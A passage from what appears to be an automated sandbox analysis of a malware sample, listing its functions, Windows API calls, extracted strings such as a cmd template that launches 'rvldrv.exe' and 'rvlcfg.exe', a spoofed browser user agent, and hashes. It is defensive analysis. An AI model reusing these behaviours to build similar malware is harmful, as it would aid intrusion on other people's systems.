                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                      • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                                      • API String ID: 1650488544-2117135753
                                                                                                                                                                                                      • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                                      • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
                                                                                                                                                                                                      Function 0040F240 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                                                                                      • memcmp.NTDLL ref: 0040F35D
                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 3902698870-3424199868
                                                                                                                                                                                                      • Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                                                                                      • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98
                                                                                                                                                                                                      Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                                                                                      • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                                                                                      • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                                                                                      • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3862671961-0
                                                                                                                                                                                                      • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                      • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99
                                                                                                                                                                                                      Function 0040BC70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                                                                                      • CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                                                                                        • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                        • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL ref: 0040DF38
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 439099756-3424199868
                                                                                                                                                                                                      • Opcode ID: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                                                                                      • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
                                                                                                                                                                                                      Function 00405C00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 3956458805-3424199868
                                                                                                                                                                                                      • Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                                      • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99
                                                                                                                                                                                                      Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 0040F40E
                                                                                                                                                                                                      • memset.NTDLL ref: 0040F41E
                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F467
                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                      • String ID: $D$open
                                                                                                                                                                                                      • API String ID: 3787208655-2182757814
                                                                                                                                                                                                      • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                                      • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759
                                                                                                                                                                                                      Function 004060A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
                                                                                                                                                                                                      • memcpy.NTDLL(?,00000000,00000100), ref: 00406141
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
                                                                                                                                                                                                      • FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 004062DD
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 1457358591-3424199868
                                                                                                                                                                                                      • Opcode ID: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                                                                                      • Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9
                                                                                                                                                                                                      Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                                                                                      • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004066C4
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004066E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                                                                                      • cl@, xrefs: 004066A0
                                                                                                                                                                                                      • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                                                                                      • %comspec%, xrefs: 004066EE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                                                                                      • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                                                                                      • API String ID: 1147330536-497122036
                                                                                                                                                                                                      • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                                      • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
                                                                                                                                                                                                      Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                                                                                      • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                                                                                        • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                        • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL ref: 0040DF38
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 671207744-0
                                                                                                                                                                                                      • Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                                      • Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                                                                                      Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                                      • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                                      • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                                      • StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleeprecvfrom
                                                                                                                                                                                                      • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                      • API String ID: 668330359-3973262388
                                                                                                                                                                                                      • Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                                      • Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
                                                                                                                                                                                                      Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
                                                                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
                                                                                                                                                                                                      • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F538
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F542
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F54D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                      • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                      • API String ID: 2743515581-2960703779
                                                                                                                                                                                                      • Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                                      • Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
                                                                                                                                                                                                      Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: device$deviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3511266565
                                                                                                                                                                                                      • Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                                      • Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
